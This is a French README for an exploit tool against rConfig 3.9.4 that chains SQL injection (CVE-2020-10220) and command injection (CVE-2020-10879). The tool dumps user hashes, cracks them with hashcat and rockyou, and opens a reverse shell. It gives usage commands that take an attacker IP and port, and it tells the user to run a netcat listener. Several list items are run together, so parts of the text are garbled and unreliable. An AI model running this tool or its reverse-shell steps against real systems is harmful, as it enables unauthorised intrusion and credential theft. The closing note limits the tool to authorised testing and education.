
PoCs combinées pour rConfig : Injection SQL (CVE-2020-10220) & Injection de commande (CVE-2020-10879)
Cette PoC cible la version 3.9.4 de rConfig et démontre l'exploitation via une combinaison de vulnérabilités d'injection SQL et d'injection de commandes à distance. Elle automatise le processus suivant :
rockyou et les règles best64.rulesCe script est basé sur et combine deux PoCs originales :
Il a été modifié pour automatiser le craquage et le lancement optionnel d'un shell.
requests (pip install requests)hashcat installé et accessible en ligne de commanderockyou.txt (ou équivalente) située dans /usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.rulePour récupérer les utilisateurs et les hachages uniquement :
python3 rConfig_rce.py https://cible
Pour récupérer les utilisateurs, craquer les mots de passe et tenter une RCE (nécessite l'IP et le port de l'attaquant pour un reverse shell) :
python3 rConfig_rce.py https://cible ip_attaquant port_attaquant
admin pour la phase d'injection de commandes.nc -lvnp 80) en cours d'exécution sur votre machine attaquante pour récupérer le reverse shell.Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée contre des systèmes sans permission est illégale et contraire à l'éthique.